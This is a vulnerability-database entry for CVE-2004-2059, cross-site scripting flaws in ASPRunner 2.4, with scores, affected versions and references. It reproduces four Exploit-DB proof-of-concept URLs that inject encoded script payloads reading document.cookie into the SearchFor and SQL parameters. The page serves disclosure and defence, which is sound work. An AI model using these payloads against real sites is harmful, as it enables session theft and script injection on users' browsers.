CVE-2004-2059
published 2004-12-31CVE-2004-2059: Multiple cross-site scripting vulnerabilities in ASPRunner 2.4 allow remote attackers to inject arbitrary web script or HTML via the (1) SearchFor parameter in…
PriorityP422medium5CVSS 2.0
AVNACLAuNCNIPAN
EXPLOIT
EPSS
8.82%
94.5th percentile
Multiple cross-site scripting vulnerabilities in ASPRunner 2.4 allow remote attackers to inject arbitrary web script or HTML via the (1) SearchFor parameter in [TABLE-NAME]_search.asp, (2) SQL parameter in [TABLE-NAME]_edit.asp, (3) SearchFor parameter in [TABLE]_list.asp, or (4) SQL parameter in export.asp.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xlinesoft | asprunner | — | — |
| xlinesoft | asprunner | — | — |
| xlinesoft | asprunner | — | — |
| xlinesoft | asprunner | — | — |
| xlinesoft | asprunner | — | — |
| xlinesoft | asprunner | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
XLineSoft ASPRunner 1.0/2.x - '[TABLE-NAME]_edit.asp?SQL' Cross-Site Scripting
exploitdb·2004-07-26
CVE-2004-2059 XLineSoft ASPRunner 1.0/2.x - '[TABLE-NAME]_edit.asp?SQL' Cross-Site Scripting
XLineSoft ASPRunner 1.0/2.x - '[TABLE-NAME]_edit.asp?SQL' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/10799/info
ASPRunner is reported prone to multiple vulnerabilities. The reported issues include SQL injection, cross-site scripting, information disclosure and unauthorized access to database files.
ASPRunner versions 2.4 and prior are affect by these issues.
http://www.example.com/[TABLE-NAME]_edit.asp?editid=2822&editid2=&editid3=&TargetPa
geNumber=1&SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ese
lect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc
%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&NeedQuoteswordid=False&Ne
edQuotes=&NeedQuotes=&action=view
Exploit-DB
XLineSoft ASPRunner 1.0/2.x - 'export.asp?SQL' Cross-Site Scripting
exploitdb·2004-07-26
CVE-2004-2059 XLineSoft ASPRunner 1.0/2.x - 'export.asp?SQL' Cross-Site Scripting
XLineSoft ASPRunner 1.0/2.x - 'export.asp?SQL' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/10799/info
ASPRunner is reported prone to multiple vulnerabilities. The reported issues include SQL injection, cross-site scripting, information disclosure and unauthorized access to database files.
ASPRunner versions 2.4 and prior are affect by these issues.
http://www.example.com/export.asp?SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%
3C%2Fscript%3Eselect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben
%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&mypage=1&
pagesize=20
Exploit-DB
XLineSoft ASPRunner 1.0/2.x - '[TABLE-NAME]_search.asp?Typeen' Cross-Site Scripting
exploitdb·2004-07-26
CVE-2004-2059 XLineSoft ASPRunner 1.0/2.x - '[TABLE-NAME]_search.asp?Typeen' Cross-Site Scripting
XLineSoft ASPRunner 1.0/2.x - '[TABLE-NAME]_search.asp?Typeen' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/10799/info
ASPRunner is reported prone to multiple vulnerabilities. The reported issues include SQL injection, cross-site scripting, information disclosure and unauthorized access to database files.
ASPRunner versions 2.4 and prior are affect by these issues.
http://www.example.com/[TABLE-NAME]_search.asp?action=AdvancedSearch&FieldName=word
_id&NeedQuoteswordid=False%2C+False&Typewordid=3%2C+3&SearchOption=Contains&
SearchFor=&FieldName=tr&NeedQuotestr=True&Typetr=202&SearchOption=Contains&S
earchFor=&FieldName=en&NeedQuotesen=True&Typeen=202&SearchOption=Contains&Se
archFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&FieldNam
e=desc&NeedQu
Exploit-DB
XLineSoft ASPRunner 1.0/2.x - '[TABLE]_list.asp?searchFor' Cross-Site Scripting
exploitdb·2004-07-26
CVE-2004-2059 XLineSoft ASPRunner 1.0/2.x - '[TABLE]_list.asp?searchFor' Cross-Site Scripting
XLineSoft ASPRunner 1.0/2.x - '[TABLE]_list.asp?searchFor' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/10799/info
ASPRunner is reported prone to multiple vulnerabilities. The reported issues include SQL injection, cross-site scripting, information disclosure and unauthorized access to database files.
ASPRunner versions 2.4 and prior are affect by these issues.
http://www.example.com/[TABLE-NAME]_list.asp?TargetPageNumber=1&sourceID=&cmdGotoPa
ge=&action=Search&SQL=select+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C
+++%5Ben%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++where+1%3D0+or+%5Btr%5D+
like+%27%25&orderby=+order+by+%5Ben%5D+desc&PageSize=20&SearchField=AnyField
&SearchOption=Contains&SearchFor=%22%3E%3Cscript%3Ealert%28document.cookie%2
9%3C%2Fscript%3E&
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0011.htmlhttp://ferruh.mavituna.com/article/?574http://marc.info/?l=bugtraq&m=109086977330418&w=2http://secunia.com/advisories/12164http://securitytracker.com/id?1010777http://www.osvdb.org/8254http://www.osvdb.org/8255http://www.osvdb.org/8256http://www.osvdb.org/8257http://www.securityfocus.com/bid/10799https://exchange.xforce.ibmcloud.com/vulnerabilities/16801http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0011.htmlhttp://ferruh.mavituna.com/article/?574http://marc.info/?l=bugtraq&m=109086977330418&w=2http://secunia.com/advisories/12164http://securitytracker.com/id?1010777http://www.osvdb.org/8254http://www.osvdb.org/8255http://www.osvdb.org/8256http://www.osvdb.org/8257http://www.securityfocus.com/bid/10799https://exchange.xforce.ibmcloud.com/vulnerabilities/16801
2004-12-31
Published